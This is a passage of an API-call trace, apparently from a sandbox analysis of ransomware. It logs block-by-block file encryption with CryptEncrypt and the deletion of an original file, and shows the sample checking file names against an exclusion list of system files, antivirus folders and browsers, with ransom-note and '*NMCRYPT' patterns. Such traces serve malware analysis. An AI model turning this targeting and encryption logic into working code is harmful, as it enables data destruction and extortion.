nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.096] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.096] GetLastError () returned 0x0 [0169.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.096] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.096] GetLastError () returned 0x0 [0169.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.096] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.096] GetLastError () returned 0x0 [0169.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.096] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.096] GetLastError () returned 0x0 [0169.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.096] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.096] GetLastError () returned 0x0 [0169.096] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.096] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.097] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.097] GetLastError () returned 0x0 [0169.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.097] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.097] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.097] GetLastError () returned 0x0 [0169.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.097] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.097] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0169.097] GetLastError () returned 0x0 [0169.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0169.097] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0169.097] WriteFile (in: hFile=0x15c4, lpBuffer=0x2893368*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0169.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui")) returned 0x20 [0169.097] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui", dwFileAttributes=0x20) returned 0 [0169.098] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned 1 [0169.098] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui")) returned 0 [0169.098] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" [0169.098] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 1 [0169.098] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX81F.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx81f.tmp")) returned 0x81f [0169.098] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX81F.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx81f.tmp"), dwFlags=0x1) returned 0 [0169.099] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\.xX81F.tmp" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\.xx81f.tmp")) returned 1 [0169.099] CryptDestroyKey (hKey=0x9ad278) returned 1 [0169.099] wcslen (_String="OK") returned 0x2 [0169.099] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.099] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0169.099] CryptDestroyKey (hKey=0x9ad878) returned 1 [0169.099] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0169.099] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0169.099] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*NMCRYPT") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*.exe") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*.dll") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*.lnk") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*.bat") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*.ini") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*.msi") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*.scf") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*AppData*") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0169.099] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*\\java\\*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*\\windows\\*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*Atheros*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*Realtek*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*bootmgr*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*boot*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*boot*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*IO.SYS*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*ntldr*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*chrome*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*opera*") returned 0 [0169.100] PathMatchSpecW (pszFile="msdaprsr.dll.mui", pszSpec="*firefox*") returned 0 [0169.100] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui", pszSpec="*") returned 1 [0169.100] strlen (_Str="NMoreira") returned 0x8 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.100] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0169.102] CryptGenRandom 